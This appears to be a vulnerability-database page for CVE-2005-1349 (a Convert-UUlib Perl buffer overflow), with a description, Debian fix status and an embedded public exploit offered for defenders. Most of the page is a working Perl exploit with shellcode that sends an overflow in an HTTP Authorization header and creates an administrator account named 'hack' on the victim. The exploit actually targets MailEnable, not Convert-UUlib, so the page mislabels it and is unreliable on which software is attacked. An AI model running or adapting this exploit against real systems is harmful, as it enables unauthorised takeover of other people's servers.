CVE-2005-1349

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Buffer overflow in Convert-UUlib (Convert::UUlib) before 1.051 allows remote attackers to execute arbitrary code via a malformed parameter to a read operation.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-25547 remote linux verified text · 4 KB

CorryL · 2005-04-26

Convert-UUlib 1.04/1.05 Perl Module - Remote Buffer Overflow

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/13401/info

Convert-UUlib Perl module is prone to a remotely exploitable buffer-overflow vulnerability.

A remote attacker may leverage this condition to overwrite sensitive program control variables and thus gain control of the process's execution flow.

This BID will be updated as soon as further information regarding this issue is made available. 

#!/usr/bin/perl
# This tools and to consider only himself to educational purpose
#
# 
#-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-
#-=[                                                               ]=-
#-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-
#-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-
#
#[+]Connecting to 127.0.0.1
#[+]Sending Evil Request
#[+]Creating Administrator User
#Connect to 127.0.0.1 Using User (hack) Pass (hack)
#
#D:\Documents and Settings\Administrator\Desktop\prova bof\mailenable-bug+exploit
#>net users
#
#Account utente per \\SERVER
#
#-------------------------------------------------------------------------------
#__vmware_user__          Administrator            ASPNET
#Guest                    hack                     IME_ADMIN
#IME_USER                 IUSR_SERVER              IWAM_SERVER
#SUPPORT_388945a0
#Esecuzione comando riuscita.
#
#
#Greatz All Users & Friends on irc.xoned.net #x0n3-h4ck


use IO::Socket; 
$ret = "\x6c\x36\xb7"; #RET For Win2003
$nop = "\x90"x24;
#win32_adduser -  PASS=hack EXITFUNC=thread USER=hack Size=240 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc7".
"\x7e\x10\xf5\x83\xeb\xfc\xe2\xf4\x3b\x96\x56\xf5\xc7\x7e\x9b\xb0".
"\xfb\xf5\x6c\xf0\xbf\x7f\xff\x7e\x88\x66\x9b\xaa\xe7\x7f\xfb\x16".
"\xe9\x37\x9b\xc1\x4c\x7f\xfe\xc4\x07\xe7\xbc\x71\x07\x0a\x17\x34".
"\x0d\x73\x11\x37\x2c\x8a\x2b\xa1\xe3\x7a\x65\x16\x4c\x21\x34\xf4".
"\x2c\x18\x9b\xf9\x8c\xf5\x4f\xe9\xc6\x95\x9b\xe9\x4c\x7f\xfb\x7c".
"\x9b\x5a\x14\x36\xf6\xbe\x74\x7e\x87\x4e\x95\x35\xbf\x71\x9b\xb5".
"\xcb\xf5\x60\xe9\x6a\xf5\x78\xfd\x2e\x75\x10\xf5\xc7\xf5\x50\xc1".
"\xc2\x02\x10\xf5\xc7\xf5\x78\xc9\x98\x4f\xe6\x95\x91\x95\x1d\x9d".
"\x28\xb0\xf0\x95\xaf\xe6\xee\x7f\xc9\x29\xef\x12\x2f\x90\xef\x0a".
"\x38\x1d\x7d\x91\xe9\x1b\x68\x90\xe7\x51\x73\xd5\xa9\x1b\x64\xd5".
"\xb2\x0d\x75\x87\xe7\x16\x71\x96\xac\x5e\x78\x94\xa4\x15\x30\xda".
"\x86\x3a\x54\xd5\xe1\x58\x30\x9b\xa2\x0a\x30\x99\xa8\x1d\x71\x99".
"\xa0\x0c\x7f\x80\xb7\x5e\x51\x91\xaa\x17\x7e\x9c\xb4\x0a\x62\x94".
"\xb3\x11\x62\x86\xe7\x16\x71\x96\xac\x5e\x3f\xb4\x83\x3a\x10\xf5";

use Getopt::Std; getopts('h:', \%args);


if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-\n";
print STDERR "-=[                                                               ]=-\n";
print STDERR "-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-\n";
print STDERR "-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-\n\n";

if (!defined($host)) {
Usage();
}

$bof = $nop.$shellcode.$ret;
$ric = "GET / HTTP/1.0\r\n";
$ric2 = "Authorization: $bof\r\n\r\n";
$richiesta = $ric.$ric2;
print "[+]Connecting to $host\n";
sleep 2;
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 8080,
                                Proto => 'tcp');
                                die unless $socket;
                                print "[+]Sending Evil Request\n";
                                sleep 2;
                                print $socket "$richiesta";
                                print "[+]Creating Administrator User\n";
                                print "Connect to $host Using User (hack) Pass (hack)\n";
                                
                               
close;

sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
exit;
}

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1.0.5.1`
sid	Fixed	`1.0.5.1`
forky	Fixed	`1.0.5.1`
bullseye	Fixed	`1.0.5.1`
bookworm	Fixed	`1.0.5.1`

References

https://security-tracker.debian.org/tracker/CVE-2005-1349

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.